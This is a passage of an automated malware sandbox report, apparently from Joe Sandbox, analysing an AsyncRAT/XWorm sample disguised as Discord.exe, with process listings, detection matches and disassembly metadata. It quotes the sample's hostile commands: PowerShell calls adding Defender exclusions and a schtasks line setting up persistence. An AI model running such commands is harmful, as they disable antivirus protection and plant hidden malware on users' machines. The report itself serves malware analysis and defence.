                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1684003889.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:1
                                    Start time:12:52:01
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\s3OBQLA3xR.exe'
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:12:52:01
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:12:52:08
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 's3OBQLA3xR.exe'
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:12:52:08
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:12:52:17
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Discord.exe'
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:8
                                    Start time:12:52:17
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:12:52:32
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Discord.exe'
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:12:52:32
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:12:52:52
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Discord" /tr "C:\Users\user\AppData\Roaming\Discord.exe"
                                    Imagebase:0x7ff76f990000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:14
                                    Start time:12:52:52
                                    Start date:13/10/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:15
                                    Start time:12:52:54
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\Discord.exe
                                    Imagebase:0x1b0000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: Joe Security
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Discord.exe, Author: ditekSHen
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 76%, ReversingLabs
                                    • Detection: 65%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:16
                                    Start time:12:53:01
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\Discord.exe
                                    Imagebase:0x380000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:17
                                    Start time:12:53:05
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\Discord.exe"
                                    Imagebase:0xa20000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:12:53:13
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Roaming\Discord.exe"
                                    Imagebase:0x4c0000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:12:54:00
                                    Start date:13/10/2024
                                    Path:C:\Users\user\AppData\Roaming\Discord.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Users\user\AppData\Roaming\Discord.exe
                                    Imagebase:0x4b0000
                                    File size:358'912 bytes
                                    MD5 hash:8090C678B1AB88D330D94A8012682263
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:18.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:13.6%
                                      Total number of Nodes:22
                                      Total number of Limit Nodes:1
                                      execution_graph 6664 7ffd9b7e764a 6665 7ffd9b7e7a70 CheckRemoteDebuggerPresent 6664->6665 6667 7ffd9b7e7b0f 6665->6667 6651 7ffd9b7e9d98 6652 7ffd9b7e9da1 SetWindowsHookExW 6651->6652 6654 7ffd9b7e9e71 6652->6654 6659 7ffd9b7e9808 6660 7ffd9b7e980d 6659->6660 6661 7ffd9b7e98d2 RtlSetProcessIsCritical 6660->6661 6663 7ffd9b7e97c5 6660->6663 6662 7ffd9b7e9932 6661->6662 6655 7ffd9b7e7a51 6656 7ffd9b7e7a9e CheckRemoteDebuggerPresent 6655->6656 6658 7ffd9b7e7b0f 6656->6658 6642 7ffd9b7eafb1 6643 7ffd9b7eafec 6642->6643 6644 7ffd9b7eb03e 6643->6644 6646 7ffd9b7e97f8 6643->6646 6647 7ffd9b7e9801 6646->6647 6648 7ffd9b7e98d2 RtlSetProcessIsCritical 6647->6648 6650 7ffd9b7e97c5 6647->6650 6649 7ffd9b7e9932 6648->6649 6649->6643 6650->6643

                                      Executed Functions

                                      Function 00007FFD9B7EA918 Relevance: 2.4, Strings: 1, Instructions: 1107COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 29 7ffd9b7ea918-7ffd9b7ee183 31 7ffd9b7ee185-7ffd9b7ee190 call 7ffd9b7e0a38 29->31 32 7ffd9b7ee1cd-7ffd9b7ee1e0 29->32 36 7ffd9b7ee195-7ffd9b7ee1e0 31->36 33 7ffd9b7ee256 32->33 34 7ffd9b7ee1e2-7ffd9b7ee1ff 32->34 38 7ffd9b7ee25b-7ffd9b7ee270 33->38 34->38 39 7ffd9b7ee201-7ffd9b7ee251 call 7ffd9b7ec2e0 34->39 36->33 36->34 44 7ffd9b7ee272-7ffd9b7ee289 call 7ffd9b7e11f8 call 7ffd9b7e0a48 38->44 45 7ffd9b7ee28e-7ffd9b7ee2a3 38->45 65 7ffd9b7eee1e-7ffd9b7eee2c 39->65 44->65 51 7ffd9b7ee2da-7ffd9b7ee2ef 45->51 52 7ffd9b7ee2a5-7ffd9b7ee2d5 call 7ffd9b7e11f8 45->52 63 7ffd9b7ee2f1-7ffd9b7ee2fd call 7ffd9b7eba28 51->63 64 7ffd9b7ee302-7ffd9b7ee317 51->64 52->65 63->65 72 7ffd9b7ee319-7ffd9b7ee31c 64->72 73 7ffd9b7ee35d-7ffd9b7ee372 64->73 72->33 74 7ffd9b7ee322-7ffd9b7ee32d 72->74 78 7ffd9b7ee3b3-7ffd9b7ee3c8 73->78 79 7ffd9b7ee374-7ffd9b7ee377 73->79 74->33 75 7ffd9b7ee333-7ffd9b7ee358 call 7ffd9b7e0a20 call 7ffd9b7eba28 74->75 75->65 86 7ffd9b7ee3ca-7ffd9b7ee3cd 78->86 87 7ffd9b7ee3f5-7ffd9b7ee40a 78->87 79->33 81 7ffd9b7ee37d-7ffd9b7ee388 79->81 81->33 84 7ffd9b7ee38e-7ffd9b7ee3ae call 7ffd9b7e0a20 call 7ffd9b7ea968 81->84 84->65 86->33 89 7ffd9b7ee3d3-7ffd9b7ee3f0 call 7ffd9b7e0a20 call 7ffd9b7ea970 86->89 95 7ffd9b7ee4e2-7ffd9b7ee4f7 87->95 96 7ffd9b7ee410-7ffd9b7ee45c call 7ffd9b7e09a8 87->96 89->65 104 7ffd9b7ee4f9-7ffd9b7ee4fc 95->104 105 7ffd9b7ee516-7ffd9b7ee52b 95->105 96->33 130 7ffd9b7ee462-7ffd9b7ee4dd 96->130 104->33 108 7ffd9b7ee502-7ffd9b7ee511 call 7ffd9b7ea948 104->108 112 7ffd9b7ee54d-7ffd9b7ee562 105->112 113 7ffd9b7ee52d-7ffd9b7ee530 105->113 108->65 121 7ffd9b7ee564-7ffd9b7ee57d 112->121 122 7ffd9b7ee582-7ffd9b7ee597 112->122 113->33 116 7ffd9b7ee536-7ffd9b7ee548 call 7ffd9b7ea948 113->116 116->65 121->65 127 7ffd9b7ee599-7ffd9b7ee5b2 122->127 128 7ffd9b7ee5b7-7ffd9b7ee5cc 122->128 127->65 134 7ffd9b7ee5ec-7ffd9b7ee601 128->134 135 7ffd9b7ee5ce-7ffd9b7ee5e7 128->135 130->65 140 7ffd9b7ee62a-7ffd9b7ee63f 134->140 141 7ffd9b7ee603-7ffd9b7ee606 134->141 135->65 145 7ffd9b7ee645-7ffd9b7ee6bd 140->145 146 7ffd9b7ee6df-7ffd9b7ee6f4 140->146 141->33 143 7ffd9b7ee60c-7ffd9b7ee625 141->143 143->65 145->33 171 7ffd9b7ee6c3-7ffd9b7ee6da 145->171 150 7ffd9b7ee70c-7ffd9b7ee721 146->150 151 7ffd9b7ee6f6-7ffd9b7ee707 146->151 157 7ffd9b7ee727-7ffd9b7ee740 150->157 158 7ffd9b7ee7c1-7ffd9b7ee7d6 150->158 151->65 157->158 162 7ffd9b7ee7d8-7ffd9b7ee7e9 158->162 163 7ffd9b7ee7ee-7ffd9b7ee803 158->163 162->65 169 7ffd9b7ee805-7ffd9b7ee83f call 7ffd9b7e0d10 call 7ffd9b7ec2e0 163->169 170 7ffd9b7ee844-7ffd9b7ee859 163->170 169->65 175 7ffd9b7ee85f-7ffd9b7ee8fb call 7ffd9b7e0d10 call 7ffd9b7ec2e0 170->175 176 7ffd9b7ee900-7ffd9b7ee915 170->176 171->65 175->65 181 7ffd9b7ee91b-7ffd9b7ee91e 176->181 182 7ffd9b7ee9a3-7ffd9b7ee9b8 176->182 184 7ffd9b7ee998-7ffd9b7ee99d 181->184 185 7ffd9b7ee920-7ffd9b7ee92b 181->185 191 7ffd9b7ee9cc-7ffd9b7ee9e1 182->191 192 7ffd9b7ee9ba-7ffd9b7ee9c7 call 7ffd9b7ec2e0 182->192 197 7ffd9b7ee99e 184->197 185->184 187 7ffd9b7ee92d-7ffd9b7ee996 call 7ffd9b7e0d10 call 7ffd9b7ec2e0 185->187 187->197 203 7ffd9b7ee9e3-7ffd9b7eea1d call 7ffd9b7e0d10 call 7ffd9b7ec2e0 191->203 204 7ffd9b7eea22-7ffd9b7eea37 191->204 192->65 197->65 203->65 213 7ffd9b7eeac2-7ffd9b7eead7 204->213 214 7ffd9b7eea3d-7ffd9b7eea4e 204->214 222 7ffd9b7eead9-7ffd9b7eeadc 213->222 223 7ffd9b7eeb17-7ffd9b7eeb2c 213->223 214->33 220 7ffd9b7eea54-7ffd9b7eea64 call 7ffd9b7e0a18 214->220 232 7ffd9b7eea66-7ffd9b7eea9b call 7ffd9b7ec2e0 220->232 233 7ffd9b7eeaa0-7ffd9b7eeabd call 7ffd9b7e0a18 call 7ffd9b7e0a20 call 7ffd9b7ea920 220->233 222->33 227 7ffd9b7eeae2-7ffd9b7eeb12 call 7ffd9b7e0a10 call 7ffd9b7e0a20 call 7ffd9b7ea920 222->227 234 7ffd9b7eeb72-7ffd9b7eeb87 223->234 235 7ffd9b7eeb2e-7ffd9b7eeb6d call 7ffd9b7e8f20 call 7ffd9b7ebf98 call 7ffd9b7ea928 223->235 227->65 232->65 233->65 252 7ffd9b7eeb89-7ffd9b7eebec call 7ffd9b7e0d10 call 7ffd9b7ec2e0 234->252 253 7ffd9b7eebf1-7ffd9b7eec06 234->253 235->65 252->65 253->65 270 7ffd9b7eec0c-7ffd9b7eec40 253->270 284 7ffd9b7eec93-7ffd9b7eec95 270->284 285 7ffd9b7eec42-7ffd9b7eec91 call 7ffd9b7eba68 call 7ffd9b7eba78 call 7ffd9b7eba88 270->285 286 7ffd9b7eec98-7ffd9b7eecb3 call 7ffd9b7eba98 284->286 285->284 295 7ffd9b7eecb5-7ffd9b7eecce call 7ffd9b7e8398 286->295 306 7ffd9b7eed21-7ffd9b7eed26 295->306 307 7ffd9b7eecd0-7ffd9b7eed1d call 7ffd9b7ebaa8 call 7ffd9b7eba78 call 7ffd9b7eba88 295->307 308 7ffd9b7eed97-7ffd9b7eedac call 7ffd9b7e0d10 306->308 309 7ffd9b7eed28-7ffd9b7eed2c 306->309 307->306 312 7ffd9b7eedad-7ffd9b7eee1d call 7ffd9b7e0a28 call 7ffd9b7ec2e0 308->312 309->312 313 7ffd9b7eed2e-7ffd9b7eed8d call 7ffd9b7ebab8 call 7ffd9b7ebac8 309->313 312->65 313->308
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: aaaeb9ac4293da44a46736d751da98c81d4c8ebcaa3f11aeb235d52f74a52179
                                      • Instruction ID: 9a29b5f470907eba9937a3757c3dc23a25126f16fd521b8f9442fa5097f3b5f5
                                      • Opcode Fuzzy Hash: aaaeb9ac4293da44a46736d751da98c81d4c8ebcaa3f11aeb235d52f74a52179
                                      • Instruction Fuzzy Hash: D2727530F1D61D4FEBA4EB7884666BD72D2EF99340B514A79D01EC32F6DE38A9428740
                                      Function 00007FFD9B7E16E9 Relevance: 2.0, Strings: 1, Instructions: 701COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CAN_^
                                      • API String ID: 0-3098826533
                                      • Opcode ID: e544efe4793427840794a36d88b2d7e37a89fb6c075f3a07c6f9a7c77711d23d
                                      • Instruction ID: d3ad8f9663a51c9c9275abdda03bc9e03c73c9cf2ef6ddfffe4d5e8f910a7538
                                      • Opcode Fuzzy Hash: e544efe4793427840794a36d88b2d7e37a89fb6c075f3a07c6f9a7c77711d23d
                                      • Instruction Fuzzy Hash: F622A570B19A4D4FE798EB78847ABBD76E1FF98304F410579E01EC32E6DE28A9418741
                                      Function 00007FFD9B7E764A Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 660 7ffd9b7e764a-7ffd9b7e7b0d CheckRemoteDebuggerPresent 664 7ffd9b7e7b15-7ffd9b7e7b58 660->664 665 7ffd9b7e7b0f 660->665 665->664
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: CheckDebuggerPresentRemote
                                      • String ID:
                                      • API String ID: 3662101638-0
                                      • Opcode ID: 68704141989427dcaff103a6deda7716c549cb8be79d1a7b2f62b2f544091dd5
                                      • Instruction ID: 9603296c13848064e410d6773d4341e3c1d4e04f2f795af85af8d9185963efce
                                      • Opcode Fuzzy Hash: 68704141989427dcaff103a6deda7716c549cb8be79d1a7b2f62b2f544091dd5
                                      • Instruction Fuzzy Hash: 0D31063190861C8FCB58DF5CC84A7FD7BE0EF65311F05426ED48AD7251CB70A8428B91
                                      Function 00007FFD9B7E6096 Relevance: .5, Instructions: 474COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: abae41437c3ad334f98160c132f66bb7c51eb3be128fd4d8d04dbe202608c6fa
                                      • Instruction ID: 24893840ddfb45d9d5848b1e372616c6261f28f3216ab1ea6d739f179a9de525
                                      • Opcode Fuzzy Hash: abae41437c3ad334f98160c132f66bb7c51eb3be128fd4d8d04dbe202608c6fa
                                      • Instruction Fuzzy Hash: 3FF1A330A09A8D8FEBA8DF28C855BE977D1FF54310F04426EE85DC72A5DB34E9458B81
                                      Function 00007FFD9B7E6E42 Relevance: .5, Instructions: 460COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b162f774c4ef38e129ed0c67ade6c61ca4da350d4952be7263bce15b3069187c
                                      • Instruction ID: 3d8568f51d3111df6bdf8276952aefb4232fe7ba48bac6f031364551dcc64fad
                                      • Opcode Fuzzy Hash: b162f774c4ef38e129ed0c67ade6c61ca4da350d4952be7263bce15b3069187c
                                      • Instruction Fuzzy Hash: C7E1C530A09A8E4FEBA8DF28D8557E977D1FF54310F14436EE84DC72A5DE74A9408B81
                                      Function 00007FFD9B7E2361 Relevance: .4, Instructions: 385COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 37b7720bd009612fa018e6f1f56f7a5cab94478920eabdd2ce3b8cc94164a4ef
                                      • Instruction ID: 814898a5a9aeea050588855525127d8ae96c76a508d6dea024158c00db20886c
                                      • Opcode Fuzzy Hash: 37b7720bd009612fa018e6f1f56f7a5cab94478920eabdd2ce3b8cc94164a4ef
                                      • Instruction Fuzzy Hash: F7C1D670B1DA0D4FEB98EBA884766BD77D2EF99304F454279E04EC32F6DE28A9014741
                                      Function 00007FFD9B7E20C1 Relevance: .2, Instructions: 205COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b30415c6ac9088d1e47c80a5ca8d2a3f45a586f81ef6ba25fd928a8a3d342ffd
                                      • Instruction ID: 3d4f21c0cbfd235bc638165544985834441ceb0751146bb4357134305963d78a
                                      • Opcode Fuzzy Hash: b30415c6ac9088d1e47c80a5ca8d2a3f45a586f81ef6ba25fd928a8a3d342ffd
                                      • Instruction Fuzzy Hash: 4D512E10B1E6C94FD79AABB848746A67FE4DF87229B0801FBE09DC71E7DD181806C342
                                      Function 00007FFD9B7E9808 Relevance: 1.9, APIs: 1, Instructions: 365COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: 6b13e4e9c8a49bc2d67142a32ec3c31d7461692b025b2c3204ddf86b4dd00eb4
                                      • Instruction ID: 0e91b14811eb892e00c916a0592c8c78b11176b77f8bba9d1868a24c9dc5b953
                                      • Opcode Fuzzy Hash: 6b13e4e9c8a49bc2d67142a32ec3c31d7461692b025b2c3204ddf86b4dd00eb4
                                      • Instruction Fuzzy Hash: EBC1F530A0C64C8FDB59DB68D859AEDBBF0FF55310F1441BED099D72A6CA34A846CB81
                                      Function 00007FFD9B7E97F8 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: CriticalProcess
                                      • String ID:
                                      • API String ID: 2695349919-0
                                      • Opcode ID: 3036e7319dd46169c58389533f763d8affc3bb9901b4b94dcc6127fd7c613b32
                                      • Instruction ID: 061c3aadabf987a618252e298070039ce5e9c8dccab57d4c66e075c245701550
                                      • Opcode Fuzzy Hash: 3036e7319dd46169c58389533f763d8affc3bb9901b4b94dcc6127fd7c613b32
                                      • Instruction Fuzzy Hash: 87510231A0D7884FD72ADBAC9869AED7FE0EF56210F1901BFD0DAC71A3CA245906C751
                                      Function 00007FFD9B7E9D98 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 641 7ffd9b7e9d98-7ffd9b7e9d9f 642 7ffd9b7e9daa-7ffd9b7e9e1d 641->642 643 7ffd9b7e9da1-7ffd9b7e9da9 641->643 646 7ffd9b7e9ea9-7ffd9b7e9ead 642->646 647 7ffd9b7e9e23-7ffd9b7e9e28 642->647 643->642 648 7ffd9b7e9e32-7ffd9b7e9e6f SetWindowsHookExW 646->648 649 7ffd9b7e9e2f-7ffd9b7e9e30 647->649 650 7ffd9b7e9e77-7ffd9b7e9ea8 648->650 651 7ffd9b7e9e71 648->651 649->648 651->650
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: HookWindows
                                      • String ID:
                                      • API String ID: 2559412058-0
                                      • Opcode ID: 842f70dd0834d7e78134a711fbcd2aa522833ba3810b79f04c5c7d43d26e88b3
                                      • Instruction ID: 5877927b7ed34ff0835772df9cd3484bf365a68c4ebb14cdce39b0260507909e
                                      • Opcode Fuzzy Hash: 842f70dd0834d7e78134a711fbcd2aa522833ba3810b79f04c5c7d43d26e88b3
                                      • Instruction Fuzzy Hash: 78310A31A1CA5D4FDB18DB58985A6F97BE1EF59311F00427ED05DC32A2CE75A812C7C1
                                      Function 00007FFD9B7E7A51 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 654 7ffd9b7e7a51-7ffd9b7e7b0d CheckRemoteDebuggerPresent 657 7ffd9b7e7b15-7ffd9b7e7b58 654->657 658 7ffd9b7e7b0f 654->658 658->657
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3007873823.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ffd9b7e0000_s3OBQLA3xR.jbxd
                                      Similarity
                                      • API ID: CheckDebuggerPresentRemote
                                      • String ID:
                                      • API String ID: 3662101638-0
                                      • Opcode ID: 64ee16dbabdf862225e120b21734f0c90bd0d9db5d605242696905de0defcfbd
                                      • Instruction ID: 5153c73b99fb85cbf91668ef846d4f456cfad1d8ecc3d8e28004011ee36cf4a4
                                      • Opcode Fuzzy Hash: 64ee16dbabdf862225e120b21734f0c90bd0d9db5d605242696905de0defcfbd
                                      • Instruction Fuzzy Hash: 2B31D3319087588FCB58DF58C88A7E97BF0EF65311F0542AED489D7292DB34A846CB91

                                      Executed Functions

                                      Function 00007FFD9B7F644D Relevance: .7, Instructions: 715COMMON
                                      Download Yara Rule
                                      Memory Dump Source
